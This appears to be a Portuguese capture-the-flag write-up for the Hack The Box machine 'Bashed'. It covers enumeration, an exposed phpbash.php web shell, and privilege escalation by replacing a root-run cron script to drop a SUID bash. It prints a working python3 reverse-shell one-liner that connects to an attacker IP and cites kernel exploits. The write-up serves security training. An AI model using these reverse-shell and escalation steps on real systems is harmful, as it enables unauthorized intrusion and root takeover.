
Enumeration
Iniciamos a enumeracao, usando o autorecon para ganhar tempo…

Em paralelo eu estava olhando o site manualmente, de inicio vc ja encontra algumas dicas sobre a maquina..
Apos isso, fui verificar o output do autorecon e encotrei algumas coisas interessantes

Veja o code de cada dir encontrado, os de code 308 sao os mais imnportantes, entao precisava verificar cada um deles, ao verificar o /dev encontro o que eu estava procurando.. o phpbash.php entao ali eu ja tinha um bash em php, eu precisava agora ter uma reverse shell.
Reverse Shell
Usando a tool gorevpop que eu criei recentemente usando Go, gerei um payload python3 e em seguida ja estava com uma reverse shell
root@kali:~/HTB-Linux/bashed# go run /opt/gorevpop/main.go 19 10.10.14.25 443
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.25",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'


Privilege Escalation
With CVE: 2017-6074
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation
reference https://www.exploit-db.com/exploits/41458

With CVE: 2017-16995
` Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation`
reference https://www.exploit-db.com/exploits/44298

Process
Analisando um pouco mais, o usuario scriptmanager nao precisa de password para executar, usando o sudo
(scriptmanager : scriptmanager) NOPASSWD: ALL

Depois de trocar de usuario comm o seguinte comando sudo -u scriptmanager /bin/bash
antes de obter root usando kernel exploit estava analisando os processos, para identificar algo sendo executado pelo o root.. usei o pspy

Veja que em minuto em minuto o root abre o /scripts em seguida executa o test.py. Entao, eu criei o meu proprio test.py e troquei pelo o existente.

Feito, isso. eh so aguardar um minuto e nosso rootbash sera criado com o suid de root no \tmp
antes:

depois:

Agora, basta ir ate o \tmp da permissao de execucao ao rootbash chmod +x rootbash em seguida executar rootbash -p e teremos nossa shell de root
